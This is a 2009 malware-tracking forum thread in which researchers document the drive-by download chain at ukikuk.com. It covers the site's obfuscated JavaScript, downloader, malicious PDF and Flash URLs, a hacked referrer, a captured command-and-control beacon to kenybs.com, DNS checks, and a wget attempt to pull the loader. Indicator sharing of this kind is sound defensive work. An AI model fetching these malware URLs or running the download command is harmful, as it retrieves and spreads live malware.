Malware Domain List

Malware Related => Malicious Domains => Topic started by: eoin.miller on August 27, 2009, 10:18:19 pm

Title: ukikuk.com
Post by: eoin.miller on August 27, 2009, 10:18:19 pm
Obfuscated Javascript
ukikuk.com/deeefe/index.php
http://wepawet.iseclab.org/domain.php?hash=a15d6eb7cc67d282d5f50cb991390cb1&type=js

Redirects to get_val.php:
ukikuk.com/deeefe/get_val.php

Loads up the downloader:
ukikuk.com/deeefe/load.php?id=0
http://www.virustotal.com/analisis/5f4a011b8f5b1f1758b7c4bb3f76a74fabe6482664a598992b0a76b93a44e763-1251373604

Malicious PDF:
ukikuk.com/deeefe/cache/readme.pdf
http://wepawet.iseclab.org/view.php?hash=75aae957b92389ec2e52f22307e1be58&t=1251413095&type=js

Malicious SWF:
ukikuk.com/deeefe/cache/flash.swf
http://wepawet.iseclab.org/view.php?hash=253639a3e73fff185fbd4c489ab0335b&type=swf

Hacked site that refrences all this stuff:
campyonly.com


PDF/JavaScript/Flash stuff links back to URLs:
lowenbrau.ru - wepawet says this known malware, but it isn't in the list?
engine.awaps.net - seems like a lot of chatter about this domain, but not in the list?
Title: Re: ukikuk.com
Post by: eoin.miller on August 28, 2009, 07:06:26 pm
Also after the malware is loaded, it calls home to kenybs.com (61.235.117.76).

Code: [Select]
POST /oewdppr/rwppwe.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: kenybs.com
Content-Length: 166
Connection: Keep-Alive
Pragma: no-cache

'EEidJ{%_M r]"lfr?I5icoo[r0!IvQ3CV@`7w4LpwVn2ge\IrSik5,?E?ER};2LfBDVH.cT[


HTTP/1.1 200 OK
Date: Thu, 27 Aug 2009 14:54:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 44
Connection: close
Content-Type: text/html

'EEidJ\I*>AvNM rP"a

This heartbeat happens every 20 minutes.
Title: Re: ukikuk.com
Post by: SysAdMini on August 28, 2009, 07:10:00 pm
ukikuk.com doesn't resolve any longer (NXDOMAIN).
Title: Re: ukikuk.com
Post by: eoin.miller on August 28, 2009, 10:02:44 pm
Hmm, weird. It is still working over here and DNS is still resolving:

Code: [Select]
user@hostname:~$ dig ukikuk.com

; <<>> DiG 9.5.1-P2 <<>> ukikuk.com
;; global options:  printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 35353
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 4, ADDITIONAL: 4

;; QUESTION SECTION:
;ukikuk.com.                    IN      A

;; ANSWER SECTION:
ukikuk.com.             2485    IN      A       61.235.117.76

;; AUTHORITY SECTION:
ukikuk.com.             961     IN      NS      ns4.everydns.net.
ukikuk.com.             961     IN      NS      ns2.everydns.net.
ukikuk.com.             961     IN      NS      ns3.everydns.net.
ukikuk.com.             961     IN      NS      ns1.everydns.net.

;; ADDITIONAL SECTION:
ns1.everydns.net.       163887  IN      A       208.76.62.100
ns2.everydns.net.       163887  IN      A       208.76.56.56
ns3.everydns.net.       163887  IN      A       75.102.60.66
ns4.everydns.net.       163887  IN      A       78.129.207.168

;; Query time: 1 msec
;; SERVER: 10.10.2.3#53(10.10.2.3)
;; WHEN: Fri Aug 28 17:50:52 2009
;; MSG SIZE  rcvd: 192

user@hostname:~$ nslookup
> server ns1.everydns.net
Default server: ns1.everydns.net
Address: 208.76.62.100#53
> ukikuk.com
Server:         ns1.everydns.net
Address:        208.76.62.100#53

Name:   ukikuk.com
Address: 61.235.117.76
> exit

Can still pull load.exe from this URL as well:
ukikuk.com/deeefe/load.php?id=0

 ???
Title: Re: ukikuk.com
Post by: cleanmx on August 28, 2009, 10:19:46 pm
nope does not resolve for me ...

-- gerhard
Code: [Select]
host -a ukikuk.com
Trying "ukikuk.com"
Host ukikuk.com not found: 3(NXDOMAIN)
Received 101 bytes from 62.67.240.16#53 in 38 ms




ksrv8:~# host -a ukikuk.com ns4.everydns.net
Trying "ukikuk.com"
Using domain server:
Name: ns4.everydns.net
Address: 78.129.207.168#53
Aliases:

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 64837
;; flags: qr aa rd; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 4

;; QUESTION SECTION:
;ukikuk.com. IN ANY

;; ANSWER SECTION:
ukikuk.com. 360 IN SOA ns1.everydns.net. hostmaster.ukikuk.com. 1251497007 3600 900 1209600 3600
ukikuk.com. 86400 IN NS ns1.everydns.net.
ukikuk.com. 86400 IN NS ns2.everydns.net.
ukikuk.com. 86400 IN NS ns3.everydns.net.
ukikuk.com. 86400 IN NS ns4.everydns.net.
ukikuk.com. 3600 IN A 61.235.117.76

;; ADDITIONAL SECTION:
ns1.everydns.net. 43200 IN A 208.76.62.100
ns2.everydns.net. 43200 IN A 208.76.56.56
ns3.everydns.net. 7200 IN A 75.102.60.66
ns4.everydns.net. 7200 IN A 78.129.207.168

Received 239 bytes from 78.129.207.168#53 in 45 ms



ksrv8:~# wget "http://ukikuk.com/deeefe/load.php?id=0"
--00:18:34--  http://ukikuk.com/deeefe/load.php?id=0
           => `load.php?id=0'
Aufl�sen des Hostnamen �ukikuk.com�.... fehlgeschlagen: Der Name oder der Dienst ist nicht bekannt.

Title: Re: ukikuk.com
Post by: Jaxryley on August 28, 2009, 11:44:12 pm
Can still pull load.exe from this URL as well:
ukikuk.com/deeefe/load.php?id=0
No go here either.
Code: [Select]
Firefox can't find the server at www.ukikuk.com.